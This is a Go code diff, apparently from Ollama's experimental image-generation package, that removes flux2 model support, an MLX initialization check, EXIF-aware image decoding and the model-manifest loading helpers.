@@ -84,11 +75,6 @@ func main() {
 		return
 	}

-	// Check if MLX initialized successfully
-	if !mlx.IsMLXAvailable() {
-		log.Fatalf("MLX initialization failed: %v", mlx.GetMLXInitError())
-	}
-
 	// CPU profiling
 	if *cpuProfile != "" {
 		f, err := os.Create(*cpuProfile)
@@ -112,56 +98,14 @@ func main() {
 			log.Fatal(loadErr)
 		}
 		var img *mlx.Array
-		img, err = m.GenerateFromConfig(context.Background(), &zimage.GenerateConfig{
-			Prompt:            *prompt,
-			NegativePrompt:    *negativePrompt,
-			CFGScale:          float32(*cfgScale),
-			Width:             int32(*width),
-			Height:            int32(*height),
-			Steps:             *steps,
-			Seed:              *seed,
-			CapturePath:       *gpuCapture,
-			TeaCache:          *teaCache,
-			TeaCacheThreshold: float32(*teaCacheThreshold),
-			FusedQKV:          *fusedQKV,
-		})
-		if err == nil {
-			err = saveImageArray(img, *out)
-		}
-	case *flux2Flag:
-		m := &flux2.Model{}
-		if loadErr := m.Load(*modelPath); loadErr != nil {
-			log.Fatal(loadErr)
-		}
-		// Load input images with EXIF orientation correction
-		var loadedImages []image.Image
-		for _, path := range inputImages {
-			img, loadErr := loadImageWithEXIF(path)
-			if loadErr != nil {
-				log.Fatalf("Failed to load image %s: %v", path, loadErr)
-			}
-			loadedImages = append(loadedImages, img)
-		}
-		// When input images provided and user didn't override dimensions, use 0 to match input
-		fluxWidth := int32(*width)
-		fluxHeight := int32(*height)
-		if len(loadedImages) > 0 && *width == 0 && *height == 0 {
-			// Both unset, will auto-detect from input
-		} else if len(loadedImages) > 0 && *width == 0 {
-			fluxWidth = 0 // Compute from height + aspect ratio
-		} else if len(loadedImages) > 0 && *height == 0 {
-			fluxHeight = 0 // Compute from width + aspect ratio
-		}
-		var img *mlx.Array
-		img, err = m.GenerateFromConfig(context.Background(), &flux2.GenerateConfig{
-			Prompt:        *prompt,
-			Width:         fluxWidth,
-			Height:        fluxHeight,
-			Steps:         *steps,
-			GuidanceScale: float32(*cfgScale),
-			Seed:          *seed,
-			CapturePath:   *gpuCapture,
-			InputImages:   loadedImages,
+		img, err = m.GenerateFromConfig(&zimage.GenerateConfig{
+			Prompt:      *prompt,
+			Width:       int32(*width),
+			Height:      int32(*height),
+			Steps:       *steps,
+			Seed:        *seed,
+			CapturePath: *gpuCapture,
+			LayerCache:  *layerCache,
 		})
 		if err == nil {
 			err = saveImageArray(img, *out)
@@ -320,8 +264,6 @@ func detectModelKind(modelPath string) (string, error) {
 			switch index.ClassName {
 			case "FluxPipeline", "ZImagePipeline":
 				return "zimage", nil
-			case "Flux2KleinPipeline":
-				return "flux2", nil
 			}
 		}
 		return "zimage", nil
@@ -342,12 +284,3 @@ func detectModelKind(modelPath string) (string, error) {

 	return cfg.ModelType, nil
 }
-
-// loadImageWithEXIF loads an image from a file path with EXIF orientation correction.
-func loadImageWithEXIF(path string) (image.Image, error) {
-	data, err := os.ReadFile(path)
-	if err != nil {
-		return nil, fmt.Errorf("read file: %w", err)
-	}
-	return imagegen.DecodeImage(data)
-}
--- a/x/imagegen/image.go
+++ b/x/imagegen/image.go
@@ -1,268 +0,0 @@
-//go:build mlx
-
-package imagegen
-
-import (
-	"bytes"
-	"encoding/base64"
-	"fmt"
-	"image"
-	_ "image/jpeg"
-	"image/png"
-	"os"
-	"path/filepath"
-
-	"github.com/ollama/ollama/x/imagegen/mlx"
-)
-
-// SaveImage saves an MLX array as a PNG image file.
-// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
-func SaveImage(arr *mlx.Array, path string) error {
-	img, err := ArrayToImage(arr)
-	if err != nil {
-		return err
-	}
-
-	if filepath.Ext(path) != ".png" {
-		path = path + ".png"
-	}
-
-	f, err := os.Create(path)
-	if err != nil {
-		return err
-	}
-	defer f.Close()
-
-	return png.Encode(f, img)
-}
-
-// EncodeImageBase64 encodes an MLX array as a base64-encoded PNG.
-// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
-func EncodeImageBase64(arr *mlx.Array) (string, error) {
-	img, err := ArrayToImage(arr)
-	if err != nil {
-		return "", err
-	}
-
-	var buf bytes.Buffer
-	if err := png.Encode(&buf, img); err != nil {
-		return "", err
-	}
-
-	return base64.StdEncoding.EncodeToString(buf.Bytes()), nil
-}
-
-// ArrayToImage converts an MLX array to a Go image.RGBA.
-// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
-func ArrayToImage(arr *mlx.Array) (*image.RGBA, error) {
-	shape := arr.Shape()
-	if len(shape) != 4 {
-		return nil, fmt.Errorf("expected 4D array [B, C, H, W], got %v", shape)
-	}
-
-	// Transform to [H, W, C] for image conversion
-	// Free intermediate arrays to avoid memory leak
-	squeezed := mlx.Squeeze(arr, 0)
-	transposed := mlx.Transpose(squeezed, 1, 2, 0)
-	squeezed.Free()
-	img := mlx.Contiguous(transposed)
-	transposed.Free()
-	mlx.Eval(img)
-
-	imgShape := img.Shape()
-	H := int(imgShape[0])
-	W := int(imgShape[1])
-	C := int(imgShape[2])
-
-	if C != 3 {
-		img.Free()
-		return nil, fmt.Errorf("expected 3 channels (RGB), got %d", C)
-	}
-
-	// Copy to CPU and free GPU memory
-	data := img.Data()
-	img.Free()
-
-	// Write directly to Pix slice (faster than SetRGBA)
-	goImg := image.NewRGBA(image.Rect(0, 0, W, H))
-	pix := goImg.Pix
-	for y := 0; y < H; y++ {
-		for x := 0; x < W; x++ {
-			srcIdx := (y*W + x) * C
-			dstIdx := (y*W + x) * 4
-			pix[dstIdx+0] = uint8(clampF(data[srcIdx+0]*255+0.5, 0, 255))
-			pix[dstIdx+1] = uint8(clampF(data[srcIdx+1]*255+0.5, 0, 255))
-			pix[dstIdx+2] = uint8(clampF(data[srcIdx+2]*255+0.5, 0, 255))
-			pix[dstIdx+3] = 255
-		}
-	}
-
-	return goImg, nil
-}
-
-func clampF(v, min, max float32) float32 {
-	if v < min {
-		return min
-	}
-	if v > max {
-		return max
-	}
-	return v
-}
-
-// DecodeImage decodes image bytes with EXIF orientation applied.
-func DecodeImage(data []byte) (image.Image, error) {
-	orientation := readJPEGOrientation(data)
-
-	img, _, err := image.Decode(bytes.NewReader(data))
-	if err != nil {
-		return nil, err
-	}
-
-	return applyOrientation(img, orientation), nil
-}
-
-// readJPEGOrientation extracts EXIF orientation from JPEG bytes.
-// Returns 1 (normal) for non-JPEG or if orientation not found.
-func readJPEGOrientation(data []byte) int {
-	if len(data) < 2 || data[0] != 0xFF || data[1] != 0xD8 {
-		return 1 // Not JPEG
-	}
-
-	r := bytes.NewReader(data[2:])
-	for {
-		var marker [2]byte
-		if _, err := r.Read(marker[:]); err != nil || marker[0] != 0xFF {
-			return 1
-		}
-
-		if marker[1] == 0xE1 { // APP1 (EXIF)
-			var lenBytes [2]byte
-			if _, err := r.Read(lenBytes[:]); err != nil {
-				return 1
-			}
-			segLen := int(uint16(lenBytes[0])<<8|uint16(lenBytes[1])) - 2
-			if segLen < 14 {
-				r.Seek(int64(segLen), 1)
-				continue
-			}
-			seg := make([]byte, segLen)
-			if _, err := r.Read(seg); err != nil {
-				return 1
-			}
-			if string(seg[:4]) == "Exif" && seg[4] == 0 && seg[5] == 0 {
-				return parseTIFFOrientation(seg[6:])
-			}
-			continue
-		}
-
-		if marker[1] == 0xD9 || marker[1] == 0xDA {
-			return 1 // EOI or SOS
-		}
-		if marker[1] >= 0xD0 && marker[1] <= 0xD7 {
-			continue // RST markers
-		}
-
-		var lenBytes [2]byte
-		if _, err := r.Read(lenBytes[:]); err != nil {
-			return 1
-		}
-		segLen := int(uint16(lenBytes[0])<<8|uint16(lenBytes[1])) - 2
-		if segLen > 0 {
-			r.Seek(int64(segLen), 1)
-		}
-	}
-}
-
-func parseTIFFOrientation(tiff []byte) int {
-	if len(tiff) < 8 {
-		return 1
-	}
-
-	var big bool
-	switch string(tiff[:2]) {
-	case "MM":
-		big = true
-	case "II":
-		big = false
-	default:
-		return 1
-	}
-
-	u16 := func(b []byte) uint16 {
-		if big {
-			return uint16(b[0])<<8 | uint16(b[1])
-		}
-		return uint16(b[1])<<8 | uint16(b[0])
-	}
-	u32 := func(b []byte) uint32 {
-		if big {
-			return uint32(b[0])<<24 | uint32(b[1])<<16 | uint32(b[2])<<8 | uint32(b[3])
-		}
-		return uint32(b[3])<<24 | uint32(b[2])<<16 | uint32(b[1])<<8 | uint32(b[0])
-	}
-
-	if u16(tiff[2:4]) != 42 {
-		return 1
-	}
-
-	ifdOffset := u32(tiff[4:8])
-	if int(ifdOffset)+2 > len(tiff) {
-		return 1
-	}
-
-	numEntries := u16(tiff[ifdOffset : ifdOffset+2])
-	for i := range int(numEntries) {
-		offset := ifdOffset + 2 + uint32(i)*12
-		if int(offset)+12 > len(tiff) {
-			break
-		}
-		if u16(tiff[offset:offset+2]) == 0x0112 { // Orientation tag
-			o := int(u16(tiff[offset+8 : offset+10]))
-			if o >= 1 && o <= 8 {
-				return o
-			}
-			return 1
-		}
-	}
-	return 1
-}
-
-func applyOrientation(img image.Image, orientation int) image.Image {
-	if orientation <= 1 || orientation > 8 {
-		return img
-	}
-
-	bounds := img.Bounds()
-	w, h := bounds.Dx(), bounds.Dy()
-
-	outW, outH := w, h
-	if orientation >= 5 {
-		outW, outH = h, w
-	}
-
-	out := image.NewRGBA(image.Rect(0, 0, outW, outH))
-	for y := range h {
-		for x := range w {
-			var dx, dy int
-			switch orientation {
-			case 2:
-				dx, dy = w-1-x, y
-			case 3:
-				dx, dy = w-1-x, h-1-y
-			case 4:
-				dx, dy = x, h-1-y
-			case 5:
-				dx, dy = y, x
-			case 6:
-				dx, dy = h-1-y, x
-			case 7:
-				dx, dy = h-1-y, w-1-x
-			case 8:
-				dx, dy = y, w-1-x
-			}
-			out.Set(dx, dy, img.At(x+bounds.Min.X, y+bounds.Min.Y))
-		}
-	}
-	return out
-}
--- a/x/imagegen/manifest.go
+++ b/x/imagegen/manifest.go
@@ -1,237 +0,0 @@
-package imagegen
-
-import (
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-	"runtime"
-	"strings"
-)
-
-// ManifestLayer represents a layer in the manifest.
-type ManifestLayer struct {
-	MediaType string `json:"mediaType"`
-	Digest    string `json:"digest"`
-	Size      int64  `json:"size"`
-	Name      string `json:"name,omitempty"` // Path-style name: "component/tensor" or "path/to/config.json"
-}
-
-// Manifest represents the manifest JSON structure.
-type Manifest struct {
-	SchemaVersion int             `json:"schemaVersion"`
-	MediaType     string          `json:"mediaType"`
-	Config        ManifestLayer   `json:"config"`
-	Layers        []ManifestLayer `json:"layers"`
-}
-
-// ModelManifest holds a parsed manifest with helper methods.
-type ModelManifest struct {
-	Manifest *Manifest
-	BlobDir  string
-}
-
-// DefaultBlobDir returns the default blob storage directory.
-func DefaultBlobDir() string {
-	home, err := os.UserHomeDir()
-	if err != nil {
-		home = "."
-	}
-	switch runtime.GOOS {
-	case "darwin":
-		return filepath.Join(home, ".ollama", "models", "blobs")
-	case "linux":
-		return filepath.Join(home, ".ollama", "models", "blobs")
-	case "windows":
-		return filepath.Join(home, ".ollama", "models", "blobs")
-	default:
-		return filepath.Join(home, ".ollama", "models", "blobs")
-	}
-}
-
-// DefaultManifestDir returns the default manifest storage directory.
-func DefaultManifestDir() string {
-	home, err := os.UserHomeDir()
-	if err != nil {
-		home = "."
-	}
-	return filepath.Join(home, ".ollama", "models", "manifests")
-}
-
-// LoadManifest loads a manifest for the given model name.
-// Model name format: "modelname" or "modelname:tag" or "host/namespace/name:tag"
-func LoadManifest(modelName string) (*ModelManifest, error) {
-	manifestPath := resolveManifestPath(modelName)
-
-	data, err := os.ReadFile(manifestPath)
-	if err != nil {
-		return nil, fmt.Errorf("read manifest: %w", err)
-	}
-
-	var manifest Manifest
-	if err := json.Unmarshal(data, &manifest); err != nil {
-		return nil, fmt.Errorf("parse manifest: %w", err)
-	}
-
-	return &ModelManifest{
-		Manifest: &manifest,
-		BlobDir:  DefaultBlobDir(),
-	}, nil
-}
-
-// resolveManifestPath converts a model name to a manifest file path.
-func resolveManifestPath(modelName string) string {
-	// Parse model name into components
-	// Default: registry.ollama.ai/library/<name>/<tag>
-	host := "registry.ollama.ai"
-	namespace := "library"
-	name := modelName
-	tag := "latest"
-
-	// Handle explicit tag
-	if idx := strings.LastIndex(name, ":"); idx != -1 {
-		tag = name[idx+1:]
-		name = name[:idx]
-	}
-
-	// Handle full path like "host/namespace/name"
-	parts := strings.Split(name, "/")
-	switch len(parts) {
-	case 3:
-		host = parts[0]
-		namespace = parts[1]
-		name = parts[2]
-	case 2:
-		namespace = parts[0]
-		name = parts[1]
-	}
-
-	return filepath.Join(DefaultManifestDir(), host, namespace, name, tag)
-}
-
-// BlobPath returns the full path to a blob given its digest.
-func (m *ModelManifest) BlobPath(digest string) string {
-	// Convert "sha256:abc123" to "sha256-abc123"
-	blobName := strings.Replace(digest, ":", "-", 1)
-	return filepath.Join(m.BlobDir, blobName)
-}
-
-// GetTensorLayers returns all tensor layers for a given component.
-// Component should be "text_encoder", "transformer", or "vae".
-// Tensor names are path-style: "component/tensor_name" (e.g., "text_encoder/model.embed_tokens.weight").
-func (m *ModelManifest) GetTensorLayers(component string) []ManifestLayer {
-	prefix := component + "/"
-	var layers []ManifestLayer
-	for _, layer := range m.Manifest.Layers {
-		if layer.MediaType == "application/vnd.ollama.image.tensor" && strings.HasPrefix(layer.Name, prefix) {
-			layers = append(layers, layer)
-		}
-	}
-	return layers
-}
-
-// GetConfigLayer returns the config layer for a given path.
-func (m *ModelManifest) GetConfigLayer(configPath string) *ManifestLayer {
-	for _, layer := range m.Manifest.Layers {
-		if layer.MediaType == "application/vnd.ollama.image.json" && layer.Name == configPath {
-			return &layer
-		}
-	}
-	return nil
-}
-
-// ReadConfig reads and returns the content of a config file.
-func (m *ModelManifest) ReadConfig(configPath string) ([]byte, error) {
-	layer := m.GetConfigLayer(configPath)
-	if layer == nil {
-		return nil, fmt.Errorf("config %q not found in manifest", configPath)
-	}
-
-	blobPath := m.BlobPath(layer.Digest)
-	return os.ReadFile(blobPath)
-}
-
-// ReadConfigJSON reads and unmarshals a config file.
-func (m *ModelManifest) ReadConfigJSON(configPath string, v any) error {
-	data, err := m.ReadConfig(configPath)
-	if err != nil {
-		return err
-	}
-	return json.Unmarshal(data, v)
-}
-
-// OpenBlob opens a blob for reading.
-func (m *ModelManifest) OpenBlob(digest string) (io.ReadCloser, error) {
-	return os.Open(m.BlobPath(digest))
-}
-
-// HasTensorLayers returns true if the manifest has any tensor layers.
-func (m *ModelManifest) HasTensorLayers() bool {
-	for _, layer := range m.Manifest.Layers {
-		if layer.MediaType == "application/vnd.ollama.image.tensor" {
-			return true
-		}
-	}
-	return false
-}
-
-// ModelInfo contains metadata about an image generation model.
-type ModelInfo struct {
-	Architecture   string
-	ParameterCount int64
-	Quantization   string
-}
-
-// GetModelInfo returns metadata about an image generation model.
-func GetModelInfo(modelName string) (*ModelInfo, error) {
-	manifest, err := LoadManifest(modelName)
-	if err != nil {
-		return nil, fmt.Errorf("failed to load manifest: %w", err)
-	}
-
-	info := &ModelInfo{}
-
-	// Read model_index.json for architecture, parameter count, and quantization
-	if data, err := manifest.ReadConfig("model_index.json"); err == nil {
-		var index struct {
-			Architecture   string `json:"architecture"`
-			ParameterCount int64  `json:"parameter_count"`
-			Quantization   string `json:"quantization"`
-		}
-		if json.Unmarshal(data, &index) == nil {
-			info.Architecture = index.Architecture
-			info.ParameterCount = index.ParameterCount
-			info.Quantization = index.Quantization
-		}
-	}
-
-	// Fallback: detect quantization from tensor names if not in config
-	if info.Quantization == "" {
-		for _, layer := range manifest.Manifest.Layers {
-			if strings.HasSuffix(layer.Name, ".weight_scale") {
-				info.Quantization = "FP8"
-				break
-			}
-		}
-		if info.Quantization == "" {
-			info.Quantization = "BF16"
-		}
-	}
-
-	// Fallback: estimate parameter count if not in config
-	if info.ParameterCount == 0 {
-		var totalSize int64
-		for _, layer := range manifest.Manifest.Layers {
-			if layer.MediaType == "application/vnd.ollama.image.tensor" {
-				if !strings.HasSuffix(layer.Name, "_scale") && !strings.HasSuffix(layer.Name, "_qbias") {
-					totalSize += layer.Size
-				}
-			}
-		}
-		// Assume BF16 (2 bytes/param) as rough estimate
-		info.ParameterCount = totalSize / 2
-	}
-
-	return info, nil
-}
--- a/Show More
+++ b/Show More